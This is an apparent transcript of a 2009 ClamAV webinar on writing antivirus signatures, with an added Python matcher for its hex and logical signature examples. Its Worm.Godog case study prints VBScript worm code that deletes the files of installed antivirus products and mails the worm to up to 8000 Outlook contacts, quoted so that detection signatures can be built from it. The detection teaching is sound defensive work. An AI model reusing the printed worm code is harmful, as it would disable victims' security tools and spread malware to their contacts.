Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
Stefano Maccaglia
 
cinema_time_new.pdf
cinema_time_new.pdfcinema_time_new.pdf
cinema_time_new.pdf
MaxDmitriev
 
Forensics perspective ERFA-møde marts 2017
 Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017
J Hartig
 
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Rahul Sasi
 
Andsec Reversing on Mach-o File
Andsec Reversing on Mach-o FileAndsec Reversing on Mach-o File
Andsec Reversing on Mach-o File
Ricardo L0gan
 
H2HC - R3MF
H2HC - R3MFH2HC - R3MF
H2HC - R3MF
Ricardo L0gan
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
IOSR Journals
 
Cppcheck and PVS-Studio compared
Cppcheck and PVS-Studio comparedCppcheck and PVS-Studio compared
Cppcheck and PVS-Studio compared
PVS-Studio
 
Techniques of attacking ICS systems
Techniques of attacking ICS systems Techniques of attacking ICS systems
Techniques of attacking ICS systems
qqlan
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
CODE BLUE
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code Analysis
Andrey Karpov
 
An Experiment with Checking the glibc Library
An Experiment with Checking the glibc LibraryAn Experiment with Checking the glibc Library
An Experiment with Checking the glibc Library
Andrey Karpov
 
Metasploit Framework Executable Encoding
Metasploit Framework Executable EncodingMetasploit Framework Executable Encoding
Metasploit Framework Executable Encoding
technology_flow
 

Similar to Webinar alain-2009-03-04-clamav (20)

Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
Automatic tool for static analysis
Automatic tool for static analysisAutomatic tool for static analysis
Automatic tool for static analysis
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
 
cinema_time_new.pdf
cinema_time_new.pdfcinema_time_new.pdf
cinema_time_new.pdf
 
Forensics perspective ERFA-møde marts 2017
 Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017
 
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
 
Andsec Reversing on Mach-o File
Andsec Reversing on Mach-o FileAndsec Reversing on Mach-o File
Andsec Reversing on Mach-o File
 
H2HC - R3MF
H2HC - R3MFH2HC - R3MF
H2HC - R3MF
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Cppcheck and PVS-Studio compared
Cppcheck and PVS-Studio comparedCppcheck and PVS-Studio compared
Cppcheck and PVS-Studio compared
 
Techniques of attacking ICS systems
Techniques of attacking ICS systems Techniques of attacking ICS systems
Techniques of attacking ICS systems
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code Analysis
 
An Experiment with Checking the glibc Library
An Experiment with Checking the glibc LibraryAn Experiment with Checking the glibc Library
An Experiment with Checking the glibc Library
 
Metasploit Framework Executable Encoding
Metasploit Framework Executable EncodingMetasploit Framework Executable Encoding
Metasploit Framework Executable Encoding
 

Webinar alain-2009-03-04-clamav

  • 1. Writing ClamAV Signatures Alain Zidouemba March 4, 2009
  • 2. About the presenter Alain Zidouemba • VRT Research Engineer for over a year • Primary responsibilities: • Malware research & signatures generation – ClamAV • Vulnerability research & rules generation – Snort • Before Sourcefire: Anti-Malware Research Engineer 2
  • 3. Outline What is ClamAV Where to get ClamAV Different ClamAV signature formats: • .hdb • .mdb • .ndb • .ldb Whitelisting Q&A 3
  • 5. What is ClamAV? Clam AntiVirus (ClamAV) is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways Provides a number of utilities including: • A flexible and scalable multi-threaded daemon (clamd) • A command line scanner (clamscan)‫‏‬ • An advanced tool for automatic database updates (freshclam)‫‏‬ • Sigtool – more later 5
  • 6. Where can I get ClamAV from? Latest stable release: ClamAV 0.94.2 • http://www.clamav.net/download/sources Most popular UNIX operating systems are supported: • GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X Up-to-date list of binary packages is available at our website: • http://clamav.net/download/packages 6
  • 7. Why learn how to write sigs? I thought Sourcefire released signatures updates several times a day! 7
  • 8. ClamAV malware detection Goal: recognize and block malware Detection is: • File-centric • Focus on recognizing malicious code in file Not intended to replace desktop AV First line of defense 8
  • 9. ClamAV Virus Database (CVD) The ClamAV project distributes two CVD files • main.cvd • daily.cvd Sigtool (ships with ClamAV) can display detailed information on CVD files: 9
  • 10. Various signature files in .cvd archive 10
  • 12. Hash database: *.hdb The format for .hdb files is as follows: • MD5:Size:MalwareName To create a signature for test.exe use the --md5 option of sigtool: 12
  • 13. Hash database: *.hdb (cont’d) That’s it! The signature is ready to be used: • The name for the detection can be changed: 13
  • 14. MD5, PE-section based: *.mdb The format for .mdb files is as follows: • PESectionSize:MD5:MalwareName The easiest way to generate MD5 based section signatures is to extract target PE sections into separate files and then run sigtool with the option -- mdb: 14
  • 15. Case study: Trojan.Bagle-328 IDA Pro indicates that the sample is “packed” Packed with Themida (as per PEiD)‫‏‬ 15
  • 16. Case study: Trojan.Bagle-328 (cont'd) Themida is used by malware writers...but also by legitimate products – false positive likely We can use pe-sig, a Ruby script that will create sigs for each section of a PE file: Finally, the signature is: • 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328 16
  • 17. Extended sig. format: *.ndb The format for .ndb files is as follows: • MalwareName:TargetType:Offset:HexSignature • TargetType is one of the following numbers specifying the type of the target file: 0: Any file 4: Mail File 1: Portable Executable 5: Graphics 2: OLE2 component (eg: VBA script) 6: ELF 3: HTML (normalized) 7: ASCII text file (normalized) 17
• 18. Case study: Trojan.Exchanger
  Many files that are very similar, yet different
• 19. Case study: Trojan.Exchanger (cont’d)
  5.exe:
  Opcode:
  • e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
  Signature:
  • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
• 20. Case study: Trojan.Exchanger (cont’d)
  7.exe:
  Opcode:
  • e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
  Signature:
  • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
• 21. Case study: Trojan.Exchanger (cont’d)
  Signature for 5.exe:
  • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
  Signature for 7.exe:
  • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
  The two differ only in the 4-byte immediate of the add ebx instruction (81 c3 imm32), so a {4} wildcard (exactly four arbitrary bytes) covers both.
  Signature to detect both 5.exe and 7.exe:
  • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
• 22. Case study: Trojan.Exchanger (cont’d)
  Moreover, for 5.exe:
  • EP: 0x4094E0
  • Binary string: 0x4095C5
  For 7.exe:
  • EP: 0x406D87
  • Binary string: 0x406E6C
  In both cases the distance between EP and our binary string is the same: 0xE5 = 229 (decimal)
• 23. Case study: Trojan.Exchanger (cont’d)
  Finally we can rewrite the signature to be:
  • Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
  This signature is more precise (the pattern is only tried at one position instead of anywhere in the file) and even matches other samples.
  ClamAV measures EP+n from the file offset of the entry point; the distance computed from the virtual addresses above is the same as long as the entry point and the string lie in the same section.
• 24. Logical signatures: *.ldb
  Logical signatures were introduced in ClamAV 0.94
  The format for .ldb files is as follows:
  • SignatureName;TargetDescriptionBlock;LogicalExpression;Subsig0;Subsig1;Subsig2;...
• 25. Case study: Worm.Godog
  A mass-mailer worm, code is in VBS
    Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
    If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then
    path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro"
    legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")
    If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then
    path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal"
    legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")
    if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then
    path = Registros & "\Antiviral Toolkit Pro"
    legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")
    if fileexists (Registro & "\AVPersonal\Avguard.exe") then
    path = Registro & "\AVPersonal"
    legions.DeleteFile (Registro & "\AVPersonal\*.*")
    if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then
    path = Registro & "\Trend PC-cillin 98"
    legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")
    legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")
    legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")
• 26. Case study: Worm.Godog (cont’d)
  After normalization, we can create 4 signatures to detect each attempt to disable AV tools as follows (the hex encodes the lowercased text, e.g. 66696c656578697374732028 is "fileexists (" and 2e64656c65746566696c652028 is ".deletefile ("; {-n} allows up to n arbitrary bytes):
  (0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro:
      66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
  (1) Antiviral Toolkit Pro:
      66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
  (2) AVPersonal:
      66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c
  (3) Trend PC-cillin 98:
      66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e
• 27. Case study: Worm.Godog (cont’d)
  The worm also sends itself to the first 8000 contacts found in the address book:
    Set Create = CreateObject ("Scripting.FileSystemObject")
    Set mail = Create.CreateTextFile("C:\mail.vbs")
    mail.writeline "On Error Resume Next"
    mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"
    mail.writeline "Set leg = CreateObject" & Chr(32) & "(" & chr(34) & "Outlook.Application" & Chr(34) & ")"
    mail.writeline "Set C = CreateObject " & Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
    mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34) & "MAPI" & Chr(34) & ")"
    mail.writeline "For A = 1 To Mail.AddressLists.Count"
    mail.writeline "Set B = Mail.AddressLists (A)"
    mail.writeline "Counter = 1"
    mail.writeline "Set C = leg.CreateItem (0)"
    mail.writeline "For D = 1 To B.AddressEntries.Count"
    mail.writeline "E = B.AddressEntries (Counter)"
    mail.writeline "C.Recipients.Add E"
    mail.writeline "Counter = Counter + 1"
    mail.writeline "If Counter > 8000 Then Exit For"
    mail.writeline "Next"
    mail.writeline "C.Subject =" & Chr(32) & Chr(34) & "Legion Game" & Chr(34)
    mail.writeline "C.Body = " & Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)
    mail.writeline "C.Attachments.Add" & Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)
    mail.writeline "C.DeleteAfterSubmit = True"
    mail.writeline "C.Send"
    mail.writeline "Next"
    mail.Close
    legion.Run ("C:\mail.vbs")
• 28. Case study: Worm.Godog (cont’d)
  A signature to detect this portion of the worm could be:
  (4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
  Finally, we can write this highly flexible signature: any one of the AV-killing subsignatures 0 to 3, together with the mailer subsignature 4.
  • Worm.Godog;Target:0;((0|1|2|3)&(4));(0);(1);(2);(3);(4)
  In a .ldb file (a single line, shown here wrapped; the subsignatures contain no spaces):
  Worm.Godog;Target:0;((0|1|2|3)&(4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
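To make the .ndb wildcards and offsets from the Trojan.Exchanger case study and the .ldb logical expression from the Worm.Godog case study concrete, here is an added Python example (not ClamAV's matcher and not code from the deck). It translates a hex signature into a byte regex, anchors it at EP+n, and evaluates a logical signature over its subsignatures. The 5.exe/7.exe byte strings and the five Godog subsignatures are the ones on the slides; the byte buffers around them, the entry-point file offset 71 and the lowercased Godog-like text are constructed for the example.

```python
"""Match ClamAV .ndb body signatures and evaluate .ldb logical signatures.

Added example for this deck, not ClamAV's matcher. It handles the wildcards used
above ({n}, {-n}, {n-}, {n-m}, *, ??), the offsets *, absolute and EP+n/EP-n, and
logical expressions over subsig numbers with |, & and parentheses. Nibble
wildcards (a?), (aa|bb) alternatives and the =,<,> match-count operators are not.
"""
import re

_TOKEN = re.compile(r"\{[^}]*\}|\*|\?\?|[0-9a-fA-F]{2}")


def hexsig_to_regex(hexsig: str):
    """Translate a ClamAV hex signature into a compiled bytes regex."""
    hexsig = "".join(hexsig.split())              # tolerate wrapped / space-broken sigs
    tokens = _TOKEN.findall(hexsig)
    if "".join(tokens) != hexsig:
        raise ValueError(f"unsupported syntax in {hexsig!r}")
    parts = []
    for tok in tokens:
        if tok == "*":
            parts.append(b".*")                   # any number of bytes
        elif tok == "??":
            parts.append(b".")                    # exactly one unknown byte
        elif tok.startswith("{"):
            body = tok[1:-1]
            if "-" in body:                       # {-n}: 0..n, {n-}: n.., {n-m}: n..m bytes
                lo, hi = body.split("-", 1)
                parts.append(b".{%d,%s}" % (int(lo or 0), hi.encode()))
            else:                                 # {n}: exactly n bytes
                parts.append(b".{%d}" % int(body))
        else:
            parts.append(re.escape(bytes.fromhex(tok)))
    return re.compile(b"".join(parts), re.DOTALL)


def match_ndb(data: bytes, line: str, ep: int = 0) -> bool:
    """Match one .ndb line (MalwareName:TargetType:Offset:HexSignature).
    `ep` is the entry point's file offset; the target type is not checked here."""
    _name, _target, offset, hexsig = line.split(":", 3)
    pat = hexsig_to_regex(hexsig)
    if offset == "*":
        return pat.search(data) is not None       # anywhere in the file
    pos = ep + int(offset[2:]) if offset.startswith("EP") else int(offset)   # "EP+229" -> ep + 229
    return pos >= 0 and pat.match(data, pos) is not None   # anchored at pos, not searched


def eval_logic(expr: str, hits: list) -> bool:
    """Evaluate '(0|1|2|3)&(4)' over per-subsig hit flags; & binds tighter than |."""
    s = "".join(expr.split())
    if not re.fullmatch(r"[\d()|&]+", s):
        raise ValueError(f"unsupported logical expression {expr!r}")
    s = re.sub(r"\d+", lambda m: "1" if hits[int(m.group())] else "0", s)   # subsig numbers -> flags
    flat = lambda t: "1" if any(all(c == "1" for c in term.split("&")) for term in t.split("|")) else "0"
    while "(" in s:
        s, n = re.subn(r"\(([01|&]+)\)", lambda m: flat(m.group(1)), s)   # reduce innermost groups
        if n == 0:
            raise ValueError(f"malformed logical expression {expr!r}")
    return flat(s) == "1"


def match_ldb(data: bytes, line: str) -> bool:
    """Evaluate one .ldb line (Name;TargetDescriptionBlock;LogicalExpr;Sub0;Sub1;...)."""
    _name, _tdb, expr, *subsigs = line.split(";")
    hits = [hexsig_to_regex(s).search(data) is not None for s in subsigs]
    return eval_logic(expr, hits)


# Constructed samples, not the deck's real files: the 5.exe / 7.exe byte strings
# placed 229 bytes after an entry point at file offset 71, and a lowercased
# Godog-like text carrying one AV-kill block and the mailer loop.
EXCHANGER_EP = 71
EXCHANGER_5 = b"\x90" * 300 + bytes.fromhex("e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4")
EXCHANGER_7 = b"\x90" * 300 + bytes.fromhex("e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4")
EXCHANGER_SIG = "Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4"
GODOG_TEXT = (
    b'if fileexists (registro & "\\kaspersky lab\\kaspersky antivirus personal pro\\avp32.exe") then\n'
    b'legions.deletefile (registro & "\\kaspersky lab\\kaspersky antivirus personal pro\\*.*")\n'
    b'for d = 1 to b.addressentries.count\nc.recipients.add e\n'
    b'if counter > 8000 then exit for\nc.attachments.add "c:\\legion.vbs"\nc.send\n'
)
GODOG_LDB = "Worm.Godog;Target:0;((0|1|2|3)&(4));" + ";".join([
    "66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c",
    "66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f",
    "66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c",
    "66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e",
    "666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64",
])

if __name__ == "__main__":
    print("5.exe:", match_ndb(EXCHANGER_5, EXCHANGER_SIG, ep=EXCHANGER_EP))
    print("7.exe:", match_ndb(EXCHANGER_7, EXCHANGER_SIG, ep=EXCHANGER_EP))
    print("Godog:", match_ldb(GODOG_TEXT, GODOG_LDB))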
  • 29. Whitelisting To whitelist a specific file create an entry in a database file with the extension of .fp following the MD5 signature format: • MD5:FileSize:Comment 29
  • 30. Whitelisting (cont’d) To whitelist a specific signature inside main.cvd add the following entry into a local file local.ign: • db_name:line_number:signature_name To ignore the “myTestSignature” at line 23 in test.ndb: • test.ndb:23:myTestSignature Daily.ign: 30
  • 31. More questions? clamav-users@lists.clamav.net - user questions clamav-devel@lists.clamav.net - technical discussions Alternatively you can try asking on the #clamav IRC channel on irc.freenode.net If you have questions or comments on this presentation: azidouemba@sourcefire.com 31
  • 32. ClamAV/VRT/Sourcefire Websites • http://www.clamav.net • http://www.snort.org • htttp://www.sourcefire.com Blogs • http://clam-av.blogspot.com • http://vrt-sourcefire.blogspot.com 32
  • 33. Contribute Sample submission • http://www.clamav.net/sendvirus/ Upload statistics: • freshclam --submit-stats Bug submission • http://bugs.clamav.net 33
  • 34. Q&A
  • 35. NOW GO AND WRITE SIGNATURES! 35 Source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714